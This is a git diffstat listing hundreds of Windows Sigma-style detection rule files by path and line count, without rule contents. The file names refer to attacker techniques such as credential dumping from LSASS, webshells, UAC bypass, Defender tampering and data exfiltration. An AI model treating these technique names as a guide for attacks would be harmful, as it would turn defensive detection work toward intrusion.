+ .../proc_creation_win_vaultcmd_list_creds.yml | 29 + .../proc_creation_win_verclsid_runs_com.yml | 35 + ...proc_creation_win_virtualbox_execution.yml | 40 + ...n_win_virtualbox_vboxdrvinst_execution.yml | 38 + ...ion_win_vmware_toolbox_cmd_persistence.yml | 35 + ...in_vmware_toolbox_cmd_persistence_susp.yml | 42 + ...win_vmware_vmtoolsd_susp_child_process.yml | 61 + ...n_win_vscode_child_processes_anomalies.yml | 57 + ...c_creation_win_vscode_tunnel_execution.yml | 40 + ...eation_win_vscode_tunnel_remote_shell_.yml | 39 + ...on_win_vscode_tunnel_renamed_execution.yml | 54 + ...tion_win_vscode_tunnel_service_install.yml | 31 + ...tion_win_vsdiagnostics_execution_proxy.yml | 32 + ..._win_vslsagent_agentextensionpath_load.yml | 31 + .../proc_creation_win_w32tm.yml | 34 + ...ab_execution_from_non_default_location.yml | 35 + .../proc_creation_win_wab_unusual_parents.yml | 40 + ...n_win_wbadmin_delete_systemstatebackup.yml | 35 + ...proc_creation_win_webdav_lnk_execution.yml | 38 + .../proc_creation_win_webshell_chopper.yml | 39 + .../proc_creation_win_webshell_hacking.yml | 104 + ..._webshell_recon_commands_and_processes.yml | 106 + ...ll_susp_process_spawned_from_webserver.yml | 91 + .../proc_creation_win_webshell_tool_recon.yml | 56 + ...reation_win_werfault_lsass_shtinkering.yml | 45 + ...ion_win_werfault_reflect_debugger_exec.yml | 33 + ...creation_win_wermgr_susp_child_process.yml | 50 + ...creation_win_wermgr_susp_exec_location.yml | 35 + ...c_creation_win_wget_download_direct_ip.yml | 64 + ...get_download_susp_file_sharing_domains.yml | 90 + ..._creation_win_where_browser_data_recon.yml | 45 + ...proc_creation_win_whoami_all_execution.yml | 33 + .../proc_creation_win_whoami_execution.yml | 31 + ...hoami_execution_from_high_priv_process.yml | 37 + ...c_creation_win_whoami_groups_discovery.yml | 30 + .../proc_creation_win_whoami_output.yml | 36 + ...roc_creation_win_whoami_parent_anomaly.yml | 45 + ...roc_creation_win_whoami_priv_discovery.yml | 32 + ...ion_win_windows_terminal_susp_children.yml | 69 + ..._creation_win_winget_add_custom_source.yml | 37 + ..._win_winget_add_insecure_custom_source.yml | 40 + ...tion_win_winget_add_susp_custom_source.yml | 41 + ..._win_winget_local_install_via_manifest.yml | 41 + ...oc_creation_win_winrar_exfil_dmp_files.yml | 38 + ...creation_win_winrar_susp_child_process.yml | 49 + ...n_win_winrar_uncommon_folder_execution.yml | 39 + .../proc_creation_win_winrm_awl_bypass.yml | 36 + ..._execution_via_scripting_api_winrm_vbs.yml | 35 + ...inrm_remote_powershell_session_process.yml | 32 + ..._creation_win_winrm_susp_child_process.yml | 37 + ...eation_win_winzip_password_compression.yml | 34 + ..._wmi_backdoor_exchange_transport_agent.yml | 32 + ..._wmi_persistence_script_event_consumer.yml | 29 + ...eation_win_wmic_eventconsumer_creation.yml | 32 + ...c_creation_win_wmic_namespace_defender.yml | 31 + ...roc_creation_win_wmic_process_creation.yml | 37 + ...creation_win_wmic_recon_computersystem.yml | 30 + ...proc_creation_win_wmic_recon_csproduct.yml | 30 + .../proc_creation_win_wmic_recon_group.yml | 33 + .../proc_creation_win_wmic_recon_hotfix.yml | 30 + .../proc_creation_win_wmic_recon_process.yml | 35 + .../proc_creation_win_wmic_recon_product.yml | 30 + ..._creation_win_wmic_recon_product_class.yml | 33 + .../proc_creation_win_wmic_recon_service.yml | 36 + ...on_win_wmic_recon_system_info_uncommon.yml | 44 + ...win_wmic_recon_unquoted_service_search.yml | 38 + ...roc_creation_win_wmic_remote_execution.yml | 38 + ...creation_win_wmic_service_manipulation.yml | 34 + ...oc_creation_win_wmic_squiblytwo_bypass.yml | 46 + ...wmic_susp_execution_via_office_process.yml | 68 + ...reation_win_wmic_susp_process_creation.yml | 59 + ...reation_win_wmic_terminate_application.yml | 34 + ...reation_win_wmic_uninstall_application.yml | 34 + ...n_win_wmic_uninstall_security_products.yml | 89 + ...reation_win_wmic_xsl_script_processing.yml | 44 + ...creation_win_wmiprvse_spawning_process.yml | 45 + ...reation_win_wmiprvse_spawns_powershell.yml | 41 + ...tion_win_wmiprvse_susp_child_processes.yml | 68 + ...ation_win_wpbbin_potential_persistence.yml | 27 + ...eation_win_wscript_cscript_script_exec.yml | 41 + ...n_wscript_cscript_susp_child_processes.yml | 54 + ...script_cscript_uncommon_extension_exec.yml | 45 + ...tion_win_wsl_child_processes_anomalies.yml | 54 + ...proc_creation_win_wsl_lolbin_execution.yml | 54 + .../proc_creation_win_wuauclt_dll_loading.yml | 52 + ...ion_win_wuauclt_no_cli_flags_execution.yml | 32 + ...creation_win_wusa_cab_files_extraction.yml | 25 + ...a_cab_files_extraction_from_susp_paths.yml | 35 + ...reation_win_wusa_susp_parent_execution.yml | 45 + .../registry_add_malware_netwire.yml | 31 + .../registry_add_malware_ursnif.yml | 34 + ...egistry_add_persistence_amsi_providers.yml | 34 + ...gistry_add_persistence_com_key_linking.yml | 34 + ...persistence_disk_cleanup_handler_entry.yml | 68 + ...e_logon_scripts_userinitmprlogonscript.yml | 28 + ...dd_pua_sysinternals_execution_via_eula.yml | 28 + ...ysinternals_renamed_execution_via_eula.yml | 71 + ...a_sysinternals_susp_execution_via_eula.yml | 43 + .../registry_event_add_local_hidden_user.yml | 28 + .../registry_event_apt_leviathan.yml | 24 + ...registry_event_apt_oceanlotus_registry.yml | 43 + .../registry_event_apt_oilrig_mar18.yml | 42 + .../registry_event_apt_pandemic.yml | 34 + .../registry_event_bypass_via_wsreset.yml | 33 + ...stry_event_cmstp_execution_by_registry.yml | 33 + ...y_events_logging_adding_reg_key_minint.yml | 35 + ...event_disable_wdigest_credential_guard.yml | 29 + ...entutl_volume_shadow_copy_service_keys.yml | 29 + .../registry_event_hack_wce_reg.yml | 27 + ...t_hybridconnectionmgr_svc_installation.yml | 29 + .../registry_event_mal_azorult.yml | 34 + .../registry_event_mal_flowcloud.yml | 30 + ...registry_event_malware_qakbot_registry.yml | 25 + ...gistry_event_mimikatz_printernightmare.yml | 47 + ...y_event_modify_screensaver_binary_path.yml | 32 + ...ry_event_narrator_feedback_persistance.yml | 29 + .../registry_event_net_ntlm_downgrade.yml | 34 + ..._dll_added_to_appcertdlls_registry_key.yml | 36 + ...dll_added_to_appinit_dlls_registry_key.yml | 33 + .../registry_event_office_test_regadd.yml | 26 + ...event_office_trust_record_modification.yml | 31 + ...registry_event_persistence_recycle_bin.yml | 32 + .../registry_event_portproxy_registry_key.yml | 31 + .../registry_event_redmimicry_winnti_reg.yml | 26 + .../registry_event_runkey_winekey.yml | 31 + .../registry_event_runonce_persistence.yml | 36 + ...try_event_shell_open_keys_manipulation.yml | 42 + ...registry_event_silentprocessexit_lsass.yml | 30 + .../registry_event_ssp_added_lsa_config.yml | 32 + ...registry_event_stickykey_like_backdoor.yml | 38 + .../registry_event_susp_atbroker_change.yml | 38 + .../registry_event_susp_download_run_key.yml | 30 + .../registry_event_susp_lsass_dll_load.yml | 35 + .../registry_event_susp_mic_cam_access.yml | 41 + ...gistry_set_enable_anonymous_connection.yml | 26 + ...stry_set_add_load_service_in_safe_mode.yml | 36 + .../registry_set_add_port_monitor.yml | 43 + .../registry_set_aedebug_persistence.yml | 29 + ...et_allow_rdp_remote_assistance_feature.yml | 27 + .../registry_set_amsi_com_hijack.yml | 29 + ...set_asep_reg_keys_modification_classes.yml | 64 + ..._set_asep_reg_keys_modification_common.yml | 78 + ...eg_keys_modification_currentcontrolset.yml | 70 + ...p_reg_keys_modification_currentversion.yml | 149 + ...eg_keys_modification_currentversion_nt.yml | 91 + ...eg_keys_modification_internet_explorer.yml | 57 + ..._set_asep_reg_keys_modification_office.yml | 82 + ..._reg_keys_modification_session_manager.yml | 48 + ...p_reg_keys_modification_system_scripts.yml | 45 + ...et_asep_reg_keys_modification_winsock2.yml | 45 + ...asep_reg_keys_modification_wow6432node.yml | 107 + ..._keys_modification_wow6432node_classes.yml | 53 + ...odification_wow6432node_currentversion.yml | 46 + .../registry_set_bginfo_custom_db.yml | 26 + .../registry_set_bginfo_custom_vbscript.yml | 30 + .../registry_set_bginfo_custom_wmi_query.yml | 30 + .../registry_set_blackbyte_ransomware.yml | 31 + ...y_set_bypass_uac_using_delegateexecute.yml | 30 + ...istry_set_bypass_uac_using_eventviewer.yml | 29 + ...et_bypass_uac_using_silentcleanup_task.yml | 29 + .../registry_set_change_rdp_port.yml | 31 + .../registry_set_change_security_zones.yml | 35 + ...stry_set_change_sysmon_driver_altitude.yml | 28 + ...gistry_set_change_winevt_channelaccess.yml | 37 + .../registry_set_chrome_extension.yml | 135 + .../registry_set_clickonce_trust_prompt.yml | 34 + ...stry_set_cobaltstrike_service_installs.yml | 42 + .../registry_set_comhijack_sdclt.yml | 28 + .../registry_set_crashdump_disabled.yml | 27 + ...istry_set_creation_service_susp_folder.yml | 52 + ...y_set_creation_service_uncommon_folder.yml | 48 + ...file_open_handler_powershell_execution.yml | 29 + ...try_set_cve_2020_1048_new_printer_port.yml | 34 + ...gistry_set_cve_2022_30190_msdt_follina.yml | 27 + ...try_set_dbgmanageddebugger_persistence.yml | 29 + .../registry_set_defender_exclusions.yml | 29 + ...registry_set_desktop_background_change.yml | 51 + ...pervisorenforcedcodeintegrity_disabled.yml | 32 + .../registry_set_dhcp_calloutdll.yml | 31 + ...istry_set_disable_administrative_share.yml | 30 + ...gistry_set_disable_autologger_sessions.yml | 37 + ...registry_set_disable_defender_firewall.yml | 31 + .../registry_set_disable_function_user.yml | 48 + ...stry_set_disable_macroruntimescanscope.yml | 32 + ...et_disable_privacy_settings_experience.yml | 27 + ..._disable_security_center_notifications.yml | 27 + .../registry_set_disable_system_restore.yml | 32 + .../registry_set_disable_uac_registry.yml | 28 + ...y_set_disable_windows_defender_service.yml | 28 + .../registry_set_disable_windows_firewall.yml | 29 + .../registry_set_disable_winevt_logging.yml | 49 + ...it_guard_net_protection_on_ms_defender.yml | 27 + ...t_disabled_microsoft_defender_eventlog.yml | 27 + ...d_pua_protection_on_microsoft_defender.yml | 27 + ...amper_protection_on_microsoft_defender.yml | 32 + .../registry_set_disallowrun_execution.yml | 27 + ...sk_cleanup_handler_autorun_persistence.yml | 52 + .../registry_set_dns_over_https_enabled.yml | 40 + ...gistry_set_dns_server_level_plugin_dll.yml | 33 + .../registry_set_dot_net_etw_tamper.yml | 48 + ...et_enabling_cor_profiler_env_variables.yml | 34 + .../registry_set_enabling_turnoffcheck.yml | 27 + .../registry_set_evtx_file_key_tamper.yml | 29 + ...ry_set_exploit_guard_susp_allowed_apps.yml | 33 + .../registry_set_fax_change_service_user.yml | 29 + .../registry_set_fax_dll_persistance.yml | 31 + .../registry_set_file_association_exefile.yml | 26 + ...egistry_set_hangs_debugger_persistence.yml | 26 + .../registry_set_hhctrl_persistence.yml | 28 + .../registry_set_hidden_extention.yml | 32 + .../registry_set/registry_set_hide_file.yml | 29 + .../registry_set_hide_function_user.yml | 37 + ...t_hide_scheduled_task_via_index_tamper.yml | 36 + ...urity_zone_protocol_defaults_downgrade.yml | 35 + ...registry_set_ime_non_default_extension.yml | 35 + .../registry_set_ime_suspicious_paths.yml | 51 + ...stry_set_install_root_or_ca_certificat.yml | 38 + ...t_explorer_disable_first_run_customize.yml | 35 + .../registry_set_legalnotice_susp_message.yml | 32 + ...y_set_lolbin_onedrivestandaloneupdater.yml | 28 + ...egistry_set_lsa_disablerestrictedadmin.yml | 33 + .../registry_set_lsass_usermode_dumping.yml | 31 + .../registry_set/registry_set_mal_adwind.yml | 30 + .../registry_set_mal_blue_mockingbird.yml | 30 + ...istry_set_net_cli_ngenassemblyusagelog.yml | 29 + ...tsh_help_dll_persistence_susp_location.yml | 52 + ...netsh_helper_dll_potential_persistence.yml | 33 + ...registry_set_new_application_appcompat.yml | 29 + .../registry_set_new_network_provider.yml | 39 + .../registry_set_odbc_driver_registered.yml | 37 + ...gistry_set_odbc_driver_registered_susp.yml | 52 + ...registry_set_office_access_vbom_tamper.yml | 32 + ...office_disable_protected_view_features.yml | 46 + .../registry_set_office_enable_dde.yml | 34 + ...ook_enable_load_macro_provider_on_boot.yml | 31 + ..._office_outlook_enable_macro_execution.yml | 31 + ...utlook_enable_unsafe_client_mail_rules.yml | 33 + ...y_set_office_outlook_security_settings.yml | 32 + ..._set_office_trust_record_susp_location.yml | 38 + ...y_set_office_trusted_location_uncommon.yml | 48 + ...egistry_set_office_vba_warnings_tamper.yml | 32 + ...ce_app_cpmpat_layer_registerapprestart.yml | 29 + .../registry_set_persistence_app_paths.yml | 54 + ...registry_set_persistence_appx_debugger.yml | 31 + .../registry_set_persistence_autodial_dll.yml | 26 + .../registry_set_persistence_chm.yml | 28 + ...rsistence_com_hijacking_susp_locations.yml | 40 + ..._persistence_comhijack_psfactorybuffer.yml | 33 + ...et_persistence_custom_protocol_handler.yml | 38 + ...et_persistence_event_viewer_events_asp.yml | 46 + .../registry_set_persistence_globalflags.yml | 43 + .../registry_set_persistence_ie.yml | 44 + .../registry_set_persistence_ifilter.yml | 72 + ...registry_set_persistence_lsa_extension.yml | 28 + .../registry_set_persistence_mpnotify.yml | 26 + .../registry_set_persistence_mycomputer.yml | 26 + ...istry_set_persistence_natural_language.yml | 36 + .../registry_set_persistence_office_vsto.yml | 49 + ...istry_set_persistence_outlook_homepage.yml | 36 + ...stry_set_persistence_outlook_todaypage.yml | 40 + ...gistry_set_persistence_reflectdebugger.yml | 30 + .../registry_set_persistence_scrobj_dll.yml | 27 + .../registry_set_persistence_search_order.yml | 94 + ...registry_set_persistence_shim_database.yml | 34 + ...istence_shim_database_susp_application.yml | 38 + ...stence_shim_database_uncommon_location.yml | 32 + .../registry_set_persistence_typed_paths.yml | 30 + .../registry_set_persistence_xll.yml | 30 + ...istry_set_policies_associations_tamper.yml | 42 + ...gistry_set_policies_attachments_tamper.yml | 35 + .../registry_set_powershell_as_service.yml | 30 + ...y_set_powershell_enablescripts_enabled.yml | 28 + ...gistry_set_powershell_execution_policy.yml | 42 + .../registry_set_powershell_in_run_keys.yml | 48 + ...gistry_set_powershell_logging_disabled.yml | 36 + ...egistry_set_provisioning_command_abuse.yml | 35 + ...set_renamed_sysinternals_eula_accepted.yml | 60 + .../registry_set_rpcrt4_etw_tamper.yml | 31 + ...stry_set_scr_file_executed_by_rundll32.yml | 35 + .../registry_set_servicedll_hijack.yml | 38 + .../registry_set_services_etw_tamper.yml | 28 + .../registry_set_set_nopolicies_user.yml | 37 + .../registry_set_sip_persistence.yml | 46 + .../registry_set_sophos_av_tamper.yml | 30 + .../registry_set_special_accounts.yml | 32 + ...ry_set_suppress_defender_notifications.yml | 27 + ...registry_set_susp_keyboard_layout_load.yml | 34 + ...y_set_susp_pendingfilerenameoperations.yml | 38 + .../registry_set_susp_printer_driver.yml | 38 + ...stry_set_susp_reg_persist_explorer_run.yml | 34 + .../registry_set_susp_run_key_img_folder.yml | 45 + .../registry_set_susp_service_installed.yml | 40 + .../registry_set_susp_user_shell_folders.yml | 28 + .../registry_set_suspicious_env_variables.yml | 64 + .../registry_set_system_lsa_nolmhash.yml | 33 + .../registry_set_taskcache_entry.yml | 59 + .../registry_set_telemetry_persistence.yml | 53 + ...egistry_set_terminal_server_suspicious.yml | 42 + ...registry_set_terminal_server_tampering.yml | 66 + .../registry_set_timeproviders_dllname.yml | 33 + ...y_set_tls_protocol_old_version_enabled.yml | 28 + .../registry_set_treatas_persistence.yml | 42 + .../registry_set_turn_on_dev_features.yml | 35 + .../registry_set_uac_bypass_eventvwr.yml | 29 + .../registry_set_uac_bypass_sdclt.yml | 32 + .../registry_set_uac_bypass_winsat.yml | 30 + .../registry_set_uac_bypass_wmp.yml | 28 + .../registry_set_vbs_payload_stored.yml | 44 + .../registry_set_wab_dllpath_reg_change.yml | 30 + ..._set_wdigest_enable_uselogoncredential.yml | 29 + .../registry_set_windows_defender_tamper.yml | 65 + ...ry_set_winget_admin_settings_tampering.yml | 29 + ...istry_set_winget_enable_local_manifest.yml | 27 + ...set_winlogon_allow_multiple_tssessions.yml | 31 + .../registry_set_winlogon_notify_key.yml | 29 + .../win_security_access_token_abuse.yml | 32 + .../win_security_admin_rdp_login.yml | 32 + ...y_diagtrack_eop_default_login_username.yml | 25 + ...er_added_security_enabled_global_group.yml | 33 + ..._removed_security_enabled_global_group.yml | 33 + .../win_security_overpass_the_hash.yml | 29 + .../win_security_pass_the_hash_2.yml | 38 + .../win_security_rdp_bluekeep_poc_scanner.yml | 28 + .../win_security_rdp_localhost_login.yml | 30 + ...scrcons_remote_wmi_scripteventconsumer.yml | 31 + ..._security_enabled_global_group_deleted.yml | 33 + ...y_successful_external_remote_rdp_login.yml | 47 + ...y_successful_external_remote_smb_login.yml | 47 + .../win_security_susp_failed_logon_source.yml | 56 + .../win_security_susp_krbrelayup.yml | 30 + ...win_security_susp_logon_newcredentials.yml | 26 + .../win_security_susp_rottenpotato.yml | 32 + .../win_security_susp_wmi_login.yml | 24 + ...in_security_wfp_endpoint_agent_blocked.yml | 99 + ...rity_aadhealth_mon_agent_regkey_access.yml | 39 + ...rity_aadhealth_svc_agent_regkey_access.yml | 41 + ...ecurity_account_backdoor_dcsync_rights.yml | 37 + .../win_security_account_discovery.yml | 43 + ...win_security_ad_object_writedac_access.yml | 32 + ...ity_ad_replication_non_machine_account.yml | 39 + .../win_security_ad_user_enumeration.yml | 46 + ...e_template_configuration_vulnerability.yml | 32 + ...mplate_configuration_vulnerability_eku.yml | 46 + .../win_security_add_remove_computer.yml | 28 + .../win_security_admin_share_access.yml | 27 + ...ty_alert_active_directory_user_control.yml | 28 + .../win_security_alert_ad_user_backdoors.yml | 41 + ..._security_alert_enable_weak_encryption.yml | 92 + .../security/win_security_alert_ruler.yml | 39 + .../security/win_security_atsvc_task.yml | 32 + .../win_security_audit_log_cleared.yml | 38 + .../win_security_camera_microphone_access.yml | 32 + ...security_cobaltstrike_service_installs.yml | 48 + ...n_security_codeintegrity_check_failure.yml | 26 + ...ecurity_dce_rpc_smb_spoolss_named_pipe.yml | 29 + .../win_security_dcom_iertutil_dll_hijack.yml | 29 + .../builtin/security/win_security_dcsync.yml | 45 + ...n_security_device_installation_blocked.yml | 25 + .../win_security_disable_event_auditing.yml | 54 + ...curity_disable_event_auditing_critical.yml | 53 + .../win_security_dot_net_etw_tamper.yml | 48 + ...rity_dpapi_domain_backupkey_extraction.yml | 28 + ..._dpapi_domain_masterkey_backup_attempt.yml | 29 + .../security/win_security_external_device.yml | 28 + .../win_security_gpo_scheduledtasks.yml | 33 + .../win_security_hidden_user_creation.yml | 26 + .../security/win_security_hktl_nofilter.yml | 34 + ...y_hybridconnectionmgr_svc_installation.yml | 28 + .../security/win_security_impacket_psexec.yml | 31 + .../win_security_impacket_secretdump.yml | 32 + ...oke_obfuscation_clip_services_security.yml | 36 + ...ation_obfuscated_iex_services_security.yml | 37 + ...ke_obfuscation_stdin_services_security.yml | 42 + ...voke_obfuscation_var_services_security.yml | 41 + ...scation_via_compress_services_security.yml | 38 + ...fuscation_via_rundll_services_security.yml | 36 + ...bfuscation_via_stdin_services_security.yml | 38 + ...scation_via_use_clip_services_security.yml | 32 + ...cation_via_use_mshta_services_security.yml | 36 + ...ion_via_use_rundll32_services_security.yml | 41 + ..._obfuscation_via_var_services_security.yml | 46 + .../security/win_security_iso_mount.yml | 37 + .../security/win_security_lm_namedpipe.yml | 49 + ...curity_lsass_access_non_system_account.yml | 60 + .../security/win_security_mal_creddumper.yml | 44 + .../win_security_mal_service_installs.yml | 37 + .../security/win_security_mal_wceaux_dll.yml | 32 + ...win_security_metasploit_authentication.yml | 34 + ...or_impacket_smb_psexec_service_install.yml | 44 + ...cobaltstrike_getsystem_service_install.yml | 50 + .../win_security_net_ntlm_downgrade.yml | 39 + ...ecurity_net_share_obj_susp_desktop_ini.yml | 33 + ..._renamed_user_account_with_dollar_sign.yml | 32 + .../win_security_not_allowed_rdp_access.yml | 31 + ...in_security_password_policy_enumerated.yml | 26 + .../security/win_security_pcap_drivers.yml | 44 + .../win_security_petitpotam_network_share.yml | 31 + ...n_security_petitpotam_susp_tgt_request.yml | 39 + .../win_security_possible_dc_shadow.yml | 36 + ...powershell_script_installed_as_service.yml | 32 + ...urity_protected_storage_service_access.yml | 27 + .../win_security_rdp_reverse_tunnel.yml | 47 + ...y_register_new_logon_process_by_rubeus.yml | 27 + ...ty_registry_permissions_weakness_check.yml | 35 + ...win_security_remote_powershell_session.yml | 29 + .../win_security_replay_attack_detected.yml | 25 + ...urity_sam_registry_hive_handle_request.yml | 35 + ...n_security_scm_database_handle_failure.yml | 32 + ...rity_scm_database_privileged_operation.yml | 31 + ...service_install_remote_access_software.yml | 53 + ..._service_installation_by_unusal_client.yml | 34 + ...ecurity_smb_file_creation_admin_shares.yml | 30 + .../win_security_susp_add_domain_trust.yml | 22 + .../win_security_susp_add_sid_history.yml | 35 + .../win_security_susp_computer_name.yml | 40 + ...win_security_susp_dsrm_password_change.yml | 25 + ...win_security_susp_failed_logon_reasons.yml | 40 + ...in_security_susp_kerberos_manipulation.yml | 58 + .../win_security_susp_ldap_dataexchange.yml | 33 + ...security_susp_local_anon_logon_created.yml | 29 + ...curity_susp_logon_explicit_credentials.yml | 39 + .../security/win_security_susp_lsass_dump.yml | 28 + .../win_security_susp_lsass_dump_generic.yml | 117 + .../win_security_susp_net_recon_activity.yml | 36 + ...win_security_susp_opened_encrypted_zip.yml | 27 + ...ity_susp_opened_encrypted_zip_filename.yml | 38 + ...rity_susp_opened_encrypted_zip_outlook.yml | 29 + ...rity_susp_outbound_kerberos_connection.yml | 40 + ...susp_possible_shadow_credentials_added.yml | 37 + .../security/win_security_susp_psexec.yml | 33 + ...n_security_susp_raccess_sensitive_fext.yml | 45 + .../win_security_susp_rc4_kerberos.yml | 31 + ..._security_susp_scheduled_task_creation.yml | 64 + ..._susp_scheduled_task_delete_or_disable.yml | 51 + ...in_security_susp_scheduled_task_update.yml | 66 + .../security/win_security_susp_sdelete.yml | 38 + .../win_security_susp_time_modification.yml | 36 + .../win_security_svcctl_remote_service.yml | 30 + .../win_security_syskey_registry_access.yml | 33 + ...rity_sysmon_channel_reference_deletion.yml | 39 + .../win_security_tap_driver_installation.yml | 28 + ...security_teams_suspicious_objectaccess.yml | 30 + ...iles_with_cred_data_via_network_shares.yml | 39 + ...ity_user_added_to_local_administrators.yml | 31 + ...l_priv_service_lsaregisterlogonprocess.yml | 28 + .../security/win_security_user_creation.yml | 30 + .../win_security_user_driver_loaded.yml | 55 + .../security/win_security_user_logoff.yml | 25 + ..._vssaudit_secevent_source_registration.yml | 28 + ..._defender_exclusions_registry_modified.yml | 33 + ...ndows_defender_exclusions_write_access.yml | 38 + ...dows_defender_exclusions_write_deleted.yml | 33 + .../security/win_security_wmi_persistence.yml | 32 + ..._security_wmiprvse_wbemcomn_dll_hijack.yml | 30 + .../win_security_workstation_was_locked.yml | 49 + ...mitigations_defender_load_unsigned_dll.yml | 30 + ...ations_unsigned_dll_from_susp_location.yml | 34 + .../win_hybridconnectionmgr_svc_running.yml | 33 + ...win_shell_core_susp_packages_installed.yml | 37 + ...lient_security_susp_failed_guest_logon.yml | 32 + .../win_system_application_sysmon_crash.yml | 24 + .../lsasrv/win_system_lsasrv_ntlmv1.yml | 29 + .../win_system_susp_dhcp_config.yml | 28 + .../win_system_susp_dhcp_config_failed.yml | 31 + .../win_system_exploit_cve_2021_42287.yml | 36 + .../win_system_lpe_indicators_tabtip.yml | 29 + .../win_system_eventlog_cleared.yml | 45 + .../win_system_susp_eventlog_cleared.yml | 39 + ...stem_kdcsvc_cert_use_no_strong_mapping.yml | 30 + .../win_system_kdcsvc_rc4_downgrade.yml | 25 + ...rkspwdump_clearing_hive_access_history.yml | 26 + .../win_system_susp_sam_dump.yml | 29 + .../win_system_volume_shadow_copy_mount.yml | 27 + ..._vuln_cve_2022_21919_or_cve_2021_34484.yml | 25 + .../win_system_susp_system_update_error.yml | 30 + ...gon_exploitation_using_wellknown_tools.yml | 29 + .../netlogon/win_system_vul_cve_2020_1472.yml | 28 + .../ntfs/win_system_ntfs_vuln_exploit.yml | 32 + ...n_system_cobaltstrike_service_installs.yml | 45 + .../win_system_defender_disabled.yml | 38 + .../win_system_hack_smbexec.yml | 36 + ...ystem_invoke_obfuscation_clip_services.yml | 32 + ...ke_obfuscation_obfuscated_iex_services.yml | 33 + ...stem_invoke_obfuscation_stdin_services.yml | 42 + ...system_invoke_obfuscation_var_services.yml | 38 + ...voke_obfuscation_via_compress_services.yml | 35 + ...invoke_obfuscation_via_rundll_services.yml | 33 + ..._invoke_obfuscation_via_stdin_services.yml | 36 + ...voke_obfuscation_via_use_clip_services.yml | 29 + ...oke_obfuscation_via_use_mshta_services.yml | 31 + ..._obfuscation_via_use_rundll32_services.yml | 38 + ...em_invoke_obfuscation_via_var_services.yml | 43 + ...system_krbrelayup_service_installation.yml | 26 + .../win_system_mal_creddumper.yml | 41 + ...tstrike_getsystem_service_installation.yml | 47 + .../win_system_moriya_rootkit.yml | 28 + ...powershell_script_installed_as_service.yml | 29 + .../win_system_service_install_anydesk.yml | 25 + .../win_system_service_install_csexecsvc.yml | 29 + .../win_system_service_install_hacktools.yml | 41 + .../win_system_service_install_mesh_agent.yml | 28 + ...tem_service_install_netsupport_manager.yml | 35 + .../win_system_service_install_paexec.yml | 28 + .../win_system_service_install_pdqdeploy.yml | 32 + ...ystem_service_install_pdqdeploy_runner.yml | 30 + ...ystem_service_install_pua_proceshacker.yml | 30 + .../win_system_service_install_remcom.yml | 28 + ...service_install_remote_access_software.yml | 55 + ...ystem_service_install_remote_utilities.yml | 37 + .../win_system_service_install_sliver.yml | 34 + ...tem_service_install_sups_unusal_client.yml | 30 + .../win_system_service_install_susp.yml | 41 + ...em_service_install_sysinternals_psexec.yml | 31 + ...win_system_service_install_tacticalrmm.yml | 28 + .../win_system_service_install_tap_driver.yml | 25 + .../win_system_service_install_uncommon.yml | 51 + ...ystem_service_terminated_error_generic.yml | 27 + ...tem_service_terminated_error_important.yml | 46 + ...system_service_terminated_unexpectedly.yml | 31 + ...n_system_susp_rtcore64_service_install.yml | 25 + ...ystem_susp_service_installation_folder.yml | 34 + ...sp_service_installation_folder_pattern.yml | 29 + ...ystem_susp_service_installation_script.yml | 40 + ...win_system_rdp_potential_cve_2019_0708.yml | 31 + ...cheduler_execution_from_susp_locations.yml | 37 + ...er_lolbin_execution_via_task_scheduler.yml | 39 + ...win_taskscheduler_susp_schtasks_delete.yml | 41 + .../win_terminalservices_rdp_ngrok.yml | 26 + .../posh_pc_alternate_powershell_hosts.yml | 44 + .../posh_pm_susp_netfirewallrule_recon.yml | 37 + .../posh_ps_compress_archive_usage.yml | 32 + .../posh_ps_mailbox_access.yml | 29 + .../posh_ps_new_smbmapping_quic.yml | 36 + .../posh_ps_registry_reconnaissance.yml | 34 + .../posh_ps_remove_item_path.yml | 38 + .../posh_ps_win_api_functions_access.yml | 44 + .../posh_ps_win_api_library_access.yml | 75 + .../proc_creation_win_csc_compilation.yml | 33 + .../proc_creation_win_curl_download.yml | 40 + .../proc_creation_win_curl_execution.yml | 32 + .../proc_creation_win_curl_fileupload.yml | 43 + .../proc_creation_win_curl_useragent.yml | 37 + ...roc_creation_win_dfsvc_child_processes.yml | 27 + ..._creation_win_diskshadow_child_process.yml | 40 + ...oc_creation_win_diskshadow_script_mode.yml | 45 + ...oc_creation_win_findstr_password_recon.yml | 39 + .../proc_creation_win_net_quic.yml | 37 + ...roc_creation_win_office_svchost_parent.yml | 38 + ...n_powershell_abnormal_commandline_size.yml | 36 + ...eation_win_powershell_crypto_namespace.yml | 48 + ..._creation_win_powershell_import_module.yml | 43 + ...on_win_regsvr32_dllregisterserver_exec.yml | 58 + ...reation_win_rundll32_dllregisterserver.yml | 42 + ...c_creation_win_susp_compression_params.yml | 41 + ...reation_win_susp_elevated_system_shell.yml | 44 + ...proc_creation_win_susp_event_log_query.yml | 51 + ...win_susp_file_permission_modifications.yml | 57 + .../proc_creation_win_taskkill_execution.yml | 39 + ...oc_creation_win_wmic_recon_system_info.yml | 70 + ...registry_event_scheduled_task_creation.yml | 33 + .../registry_set_office_trusted_location.yml | 38 + ...gistry_set_powershell_crypto_namespace.yml | 48 + .../win_security_scheduled_task_deletion.yml | 34 + .../posh_ps_cl_invocation_lolscript_count.yml | 32 + ...h_ps_cl_mutexverifiers_lolscript_count.yml | 32 + ..._correlation_apt_silence_downloader_v3.yml | 43 + ..._correlation_apt_turla_commands_medium.yml | 37 + ...tion_dnscat2_powershell_implementation.yml | 39 + ...tion_win_correlation_multiple_susp_cli.yml | 67 + ...orrelation_susp_builtin_commands_recon.yml | 49 + ...d_cmd_and_powershell_spawned_processes.yml | 41 + ...ess_fake_files_with_stored_credentials.yml | 32 + ..._party_drivers_exploits_token_stealing.yml | 30 + .../unsupported/win_mal_service_installs.yml | 42 + ...or_impacket_smb_psexec_service_install.yml | 42 + .../unsupported/win_remote_schtask.yml | 39 + ...in_security_global_catalog_enumeration.yml | 30 + .../win_security_rare_schtasks_creations.yml | 29 + ...usp_failed_logons_explicit_credentials.yml | 32 + ...rity_susp_failed_logons_single_process.yml | 34 + ...urity_susp_failed_logons_single_source.yml | 31 + ...rity_susp_failed_logons_single_source2.yml | 33 + ...p_failed_logons_single_source_kerberos.yml | 34 + ..._failed_logons_single_source_kerberos2.yml | 34 + ..._failed_logons_single_source_kerberos3.yml | 34 + ..._susp_failed_logons_single_source_ntlm.yml | 33 + ...susp_failed_logons_single_source_ntlm2.yml | 33 + ...usp_failed_remote_logons_single_source.yml | 33 + ...susp_multiple_files_renamed_or_deleted.yml | 31 + .../win_security_susp_samr_pwset.yml | 29 + .../win_susp_failed_hidden_share_mount.yml | 31 + 